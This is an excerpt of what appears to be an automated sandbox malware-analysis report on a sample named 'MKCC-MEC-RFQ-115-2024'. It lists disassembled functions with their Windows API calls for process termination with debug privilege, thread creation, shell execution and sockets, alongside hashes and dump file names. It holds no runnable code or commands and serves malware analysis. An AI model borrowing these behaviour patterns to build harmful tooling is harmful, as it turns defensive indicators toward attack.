                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                              • String ID:
                                              • API String ID: 793581249-0
                                              • Opcode ID: 558cc81bc20952fdae61e440a5fe113dd52ec74942ea7bf9f6ed389b32d8bdde
                                              • Instruction ID: cfbb495226f034d859bd566d6396176d1936bb75c22ff09c9fa56416e7f0331f
                                              • Opcode Fuzzy Hash: 558cc81bc20952fdae61e440a5fe113dd52ec74942ea7bf9f6ed389b32d8bdde
                                              • Instruction Fuzzy Hash: 885187B20087859BC724DB50DC819DFB3ECAF94341F14492EF199D31A2EF74A588C766
                                              Function 00138E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00138A84,00000B00,?,?), ref: 00138E0C
                                              • HeapAlloc.KERNEL32(00000000,?,00138A84,00000B00,?,?), ref: 00138E13
                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00138A84,00000B00,?,?), ref: 00138E28
                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00138A84,00000B00,?,?), ref: 00138E30
                                              • DuplicateHandle.KERNEL32(00000000,?,00138A84,00000B00,?,?), ref: 00138E33
                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00138A84,00000B00,?,?), ref: 00138E43
                                              • GetCurrentProcess.KERNEL32(00138A84,00000000,?,00138A84,00000B00,?,?), ref: 00138E4B
                                              • DuplicateHandle.KERNEL32(00000000,?,00138A84,00000B00,?,?), ref: 00138E4E
                                              • CreateThread.KERNEL32(00000000,00000000,00138E74,00000000,00000000,00000000), ref: 00138E68
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                              • String ID:
                                              • API String ID: 1957940570-0
                                              • Opcode ID: 1210bffef53295762dfc8761a9e898c2eb16526b3f49795f4a04f951b4cd7a2e
                                              • Instruction ID: 153c06610ebcfa6df51c79234a361cfd8395b992096be4ee121c0108deaf82f9
                                              • Opcode Fuzzy Hash: 1210bffef53295762dfc8761a9e898c2eb16526b3f49795f4a04f951b4cd7a2e
                                              • Instruction Fuzzy Hash: 5901BBB5240308FFE710ABA5EC4DF6B3BACEB89751F004425FA05DB5A1CAB19841CB20
                                              Function 00159428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit$_memset
                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                              • API String ID: 2862541840-625585964
                                              • Opcode ID: 99eedd4c23c9ea69e69b3cc56be1c89953a7bc6b5ffcb9b7d80bde256aab8680
                                              • Instruction ID: 30bfa8c88cd0f1b7354c790bec5512ff5e9165eb1f5f28479ec54b54a5231e83
                                              • Opcode Fuzzy Hash: 99eedd4c23c9ea69e69b3cc56be1c89953a7bc6b5ffcb9b7d80bde256aab8680
                                              • Instruction Fuzzy Hash: 8A918C71A00215EFDF24DFA5C848FAEB7B8EF45711F10815AF925AB280D7709949CBA1
                                              Function 00159A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00137652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0013758C,80070057,?,?,?,0013799D), ref: 0013766F
                                                • Part of subcall function 00137652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0013758C,80070057,?,?), ref: 0013768A
                                                • Part of subcall function 00137652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0013758C,80070057,?,?), ref: 00137698
                                                • Part of subcall function 00137652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0013758C,80070057,?), ref: 001376A8
                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00159B1B
                                              • _memset.LIBCMT ref: 00159B28
                                              • _memset.LIBCMT ref: 00159C6B
                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00159C97
                                              • CoTaskMemFree.OLE32(?), ref: 00159CA2
                                              Strings
                                              • NULL Pointer assignment, xrefs: 00159CF0
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                              • String ID: NULL Pointer assignment
                                              • API String ID: 1300414916-2785691316
                                              • Opcode ID: 17115ab0905219c26ff2dce679e9f1f4ef1ea11eef4f7f085f37ef7d672deb33
                                              • Instruction ID: 4c91dd4a8fb80eac2c84bde55989be1070bcfee870f67704988a4189806c43a8
                                              • Opcode Fuzzy Hash: 17115ab0905219c26ff2dce679e9f1f4ef1ea11eef4f7f085f37ef7d672deb33
                                              • Instruction Fuzzy Hash: BA913871D00219EFDF10DFA5DC80ADEBBB8AF08310F20416AF819AB281DB715A45CFA1
                                              Function 0015EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00143E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00143EB6
                                                • Part of subcall function 00143E91: Process32FirstW.KERNEL32(00000000,?), ref: 00143EC4
                                                • Part of subcall function 00143E91: CloseHandle.KERNEL32(00000000), ref: 00143F8E
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0015ECB8
                                              • GetLastError.KERNEL32 ref: 0015ECCB
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0015ECFA
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0015ED77
                                              • GetLastError.KERNEL32(00000000), ref: 0015ED82
                                              • CloseHandle.KERNEL32(00000000), ref: 0015EDB7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                              • String ID: SeDebugPrivilege
                                              • API String ID: 2533919879-2896544425
                                              • Opcode ID: 0cc37cd76ae56bb4fb94cd162770d7613d40635f18201c0c092bbc47bfceba32
                                              • Instruction ID: d68cfd581091f3d4125e57475c63a5eafbdfc9c200f5c50ed250fb8367beb984
                                              • Opcode Fuzzy Hash: 0cc37cd76ae56bb4fb94cd162770d7613d40635f18201c0c092bbc47bfceba32
                                              • Instruction Fuzzy Hash: 0641BE716002019FDB18EF24CC95FBDB7A5AF90710F08802CF9529F2D2DBB5A908CB92
                                              Function 0016B958 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ShowWindow.USER32(001A67B0,00000000,00F154E0,?,?,001A67B0,?,0016B862,?,?), ref: 0016B9CC
                                              • EnableWindow.USER32(00000000,00000000), ref: 0016B9F0
                                              • ShowWindow.USER32(001A67B0,00000000,00F154E0,?,?,001A67B0,?,0016B862,?,?), ref: 0016BA50
                                              • ShowWindow.USER32(00000000,00000004,?,0016B862,?,?), ref: 0016BA62
                                              • EnableWindow.USER32(00000000,00000001), ref: 0016BA86
                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0016BAA9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$Show$Enable$MessageSend
                                              • String ID: @U=u
                                              • API String ID: 642888154-2594219639
                                              • Opcode ID: 4cd72e3b0b01cd5d8ed4415642576b414791ac31d6ea2756a15c5299d4bac12e
                                              • Instruction ID: 9098de3d1a7f647e8826ddb9ff0df7af80718d117012e25aa37595687e77993f
                                              • Opcode Fuzzy Hash: 4cd72e3b0b01cd5d8ed4415642576b414791ac31d6ea2756a15c5299d4bac12e
                                              • Instruction Fuzzy Hash: 39417170608240AFDB25CF58DCC9B957BE1FF05315F1942B9EA48CF6A2C771A8A6CB50
                                              Function 00143226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadIconW.USER32(00000000,00007F03), ref: 001432C5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: IconLoad
                                              • String ID: blank$info$question$stop$warning
                                              • API String ID: 2457776203-404129466
                                              • Opcode ID: 1338f5e57281ed73f9bf046505b3b46bf5fae8c81a3bb89dd850b9843d02705e
                                              • Instruction ID: a097b8f8e0ee9928387c40dd7d6110e1f0319fe6afaa822f869b40e1f6d23a7d
                                              • Opcode Fuzzy Hash: 1338f5e57281ed73f9bf046505b3b46bf5fae8c81a3bb89dd850b9843d02705e
                                              • Instruction Fuzzy Hash: 8011063124C346BBEB055B54EC43CAAB39CEF29370F20402AF920A61D1E7F56B4146F5
                                              Function 00144534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0014454E
                                              • LoadStringW.USER32(00000000), ref: 00144555
                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0014456B
                                              • LoadStringW.USER32(00000000), ref: 00144572
                                              • _wprintf.LIBCMT ref: 00144598
                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 001445B6
                                              Strings
                                              • %s (%d) : ==> %s: %s %s, xrefs: 00144593
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: HandleLoadModuleString$Message_wprintf
                                              • String ID: %s (%d) : ==> %s: %s %s
                                              • API String ID: 3648134473-3128320259
                                              • Opcode ID: 02c3300441ebf12f297d92ce5908d1d8adc2d6c9a71aa3cf912b08ac89395d69
                                              • Instruction ID: 4e0e20dd19cd3ef93aaee9cc85844053d9dea3d6160431efb746b8008406b937
                                              • Opcode Fuzzy Hash: 02c3300441ebf12f297d92ce5908d1d8adc2d6c9a71aa3cf912b08ac89395d69
                                              • Instruction Fuzzy Hash: 62014FF290420CBFE710A7A4ED89EE6776CE708301F0005A9FB45E6051EBB49E868B70
                                              Function 000E2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                              Download Yara Rule
                                              APIs
                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0011C417,00000004,00000000,00000000,00000000), ref: 000E2ACF
                                              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0011C417,00000004,00000000,00000000,00000000,000000FF), ref: 000E2B17
                                              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0011C417,00000004,00000000,00000000,00000000), ref: 0011C46A
                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0011C417,00000004,00000000,00000000,00000000), ref: 0011C4D6
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ShowWindow
                                              • String ID:
                                              • API String ID: 1268545403-0
                                              • Opcode ID: 92241de3800c247f188de9c57be95dd09b6d343c0148c99f70096798617a8ce2
                                              • Instruction ID: 54b273511484e61b3036b307ef84f239774e76935d481532da1a88471e6a172a
                                              • Opcode Fuzzy Hash: 92241de3800c247f188de9c57be95dd09b6d343c0148c99f70096798617a8ce2
                                              • Instruction Fuzzy Hash: 89411B312087C09FC7798B2ADC987BB7BDAAB85310F1D843EE04766961C77598C2D752
                                              Function 00147368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 0014737F
                                                • Part of subcall function 00100FF6: std::exception::exception.LIBCMT ref: 0010102C
                                                • Part of subcall function 00100FF6: __CxxThrowException@8.LIBCMT ref: 00101041
                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 001473B6
                                              • EnterCriticalSection.KERNEL32(?), ref: 001473D2
                                              • _memmove.LIBCMT ref: 00147420
                                              • _memmove.LIBCMT ref: 0014743D
                                              • LeaveCriticalSection.KERNEL32(?), ref: 0014744C
                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00147461
                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00147480
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                              • String ID:
                                              • API String ID: 256516436-0
                                              • Opcode ID: 774f5cba42ea92134c59d48aed4782b638448131c12247431b28b7d8490229ef
                                              • Instruction ID: 90e1a11f8fea4cb80794637bf818a53d40b79cf9d1400e9743959ddfe2fe5571
                                              • Opcode Fuzzy Hash: 774f5cba42ea92134c59d48aed4782b638448131c12247431b28b7d8490229ef
                                              • Instruction Fuzzy Hash: 6A319C32904205EBCF10DF64DC85AAEBBB8FF45710F1440A9F944AB29ADB70DA55DBA0
                                              Function 0013C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _memcmp
                                              • String ID:
                                              • API String ID: 2931989736-0
                                              • Opcode ID: 5189b432aef946cefd11743493bb6299068e20de2a72b66a048241cdcbd0b039
                                              • Instruction ID: 7d3a52c76909a2d2e1619b114cae104d1a28dd4c717257bff158817e690f268b
                                              • Opcode Fuzzy Hash: 5189b432aef946cefd11743493bb6299068e20de2a72b66a048241cdcbd0b039
                                              • Instruction Fuzzy Hash: E721C975A00209F7D628A5218D52FBF33ACAF30394F084020FD09B62D2EBA6DD1297E5
                                              Function 0014ED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E9997: __itow.LIBCMT ref: 000E99C2
                                                • Part of subcall function 000E9997: __swprintf.LIBCMT ref: 000E9A0C
                                                • Part of subcall function 000FFEC6: _wcscpy.LIBCMT ref: 000FFEE9
                                              • _wcstok.LIBCMT ref: 0014EEFF
                                              • _wcscpy.LIBCMT ref: 0014EF8E
                                              • _memset.LIBCMT ref: 0014EFC1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                              • String ID: X
                                              • API String ID: 774024439-3081909835
                                              • Opcode ID: 0a0d15719c7654b7ee80a709f85321859c4fb03a0b6cafb23b228b409ae84de5
                                              • Instruction ID: 8cc31c073a12ec4a12e81efef1d04f00eb3477c9d4abfe5bb4edaae0a4eb5831
                                              • Opcode Fuzzy Hash: 0a0d15719c7654b7ee80a709f85321859c4fb03a0b6cafb23b228b409ae84de5
                                              • Instruction Fuzzy Hash: C7C17E715083419FD724EF24C885AAAB7E4FF84310F14492DF899AB3A2DB70ED45CB82
                                              Function 00156E17 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00156F14
                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00156F35
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00156F48
                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 00156FFE
                                              • inet_ntoa.WSOCK32(?), ref: 00156FBB
                                                • Part of subcall function 0013AE14: _strlen.LIBCMT ref: 0013AE1E
                                                • Part of subcall function 0013AE14: _memmove.LIBCMT ref: 0013AE40
                                              • _strlen.LIBCMT ref: 00157058
                                              • _memmove.LIBCMT ref: 001570C1
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                              • String ID:
                                              • API String ID: 3619996494-0
                                              • Opcode ID: eb5382d28a2b96e238976c6cd4e550d3a6e40c5960f1995a702659109d73150e
                                              • Instruction ID: cb17857d0a8f35289b917c9363d0d68b905d00638b234ab8eb1b91ea5e5b581e
                                              • Opcode Fuzzy Hash: eb5382d28a2b96e238976c6cd4e550d3a6e40c5960f1995a702659109d73150e
                                              • Instruction Fuzzy Hash: 7181DF71108300EFC714EB25DC82EABB3E8AF84714F54891CF965AB2D2DB709D09C792
                                              Function 000E1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f79fa2902900075664b6a57dfa65156f6eaaa68c8fb2e76d4d3b8973375c4a61
                                              • Instruction ID: a31abadb11fe23803ceebad7cb192b66117495a9704c1e5f8015797982f83d28
                                              • Opcode Fuzzy Hash: f79fa2902900075664b6a57dfa65156f6eaaa68c8fb2e76d4d3b8973375c4a61
                                              • Instruction Fuzzy Hash: AA718D71904149EFCB14CF99CC88EFEBB79FF85314F148159F915AA291D730AA52CBA0
                                              Function 0015F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 0015F75C
                                              • _memset.LIBCMT ref: 0015F825
                                              • ShellExecuteExW.SHELL32(?), ref: 0015F86A
                                                • Part of subcall function 000E9997: __itow.LIBCMT ref: 000E99C2
                                                • Part of subcall function 000E9997: __swprintf.LIBCMT ref: 000E9A0C
                                                • Part of subcall function 000FFEC6: _wcscpy.LIBCMT ref: 000FFEE9
                                              • GetProcessId.KERNEL32(00000000), ref: 0015F8E1
                                              • CloseHandle.KERNEL32(00000000), ref: 0015F910
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                              • String ID: @
                                              • API String ID: 3522835683-2766056989
